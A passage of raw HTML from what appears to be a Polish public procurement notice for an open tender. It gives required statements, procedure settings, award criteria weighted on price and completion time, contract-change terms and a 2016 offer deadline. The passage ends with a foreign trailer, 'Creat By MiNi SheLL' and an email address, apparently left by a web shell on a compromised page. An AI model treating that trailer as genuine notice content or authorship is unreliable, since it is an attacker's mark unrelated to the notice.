                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie o braku podstaw do wykluczenia aktualne na dzień składania ofert załącznik nr 3 do SIWZ.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie o spełnianiu warunków udziału w postępowaniu załącznik nr 2 do SIWZ<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>70</td></tr><tr><td>czas wykonania opracowana</td><td>30</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.
2. Niedopuszczalne pod rygorem nieważności są zmiany istotnych postanowień zawartej umowy         w stosunku do treści oferty, z wyjątkiem zmian, o których mowa w ust. 3.
3. Zmiany w umowie mogą dotyczyć:
a) terminu wykonania zamówienia,
b) wysokości wynagrodzenia Wykonawcy,
c) zmiany członków zespołu projektowego
4. Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) rezygnacji z realizacji części zamówienia,
2) przerwy w realizacji zamówienia na skutek działań podmiotów trzecich, np.: przedłużania terminów wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, badań, ekspertyz, uzgodnień z przyczyn niezawinionych przez Wykonawcę,
3) czasowego wstrzymania prac przez Zamawiającego.
5. Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku:
1) odstąpienia (rezygnacji) od części zamówienia, lub rozszerzenia jego zakresu,
2) zmiany stawki podatku VAT, przy czym ceny netto nie ulegają zmianie.
6. Zmiana członków zespołu projektowego może nastąpić pod warunkiem uzyskania pisemnej zgody zamawiającego. Członek zespołu projektowego który będzie realizował zadania projektowe musi posiadać wymagane SIWZ uprawniania i doświadczenie nie gorsze niż zaproponowane w ofercie wykonawcy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 11/10/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com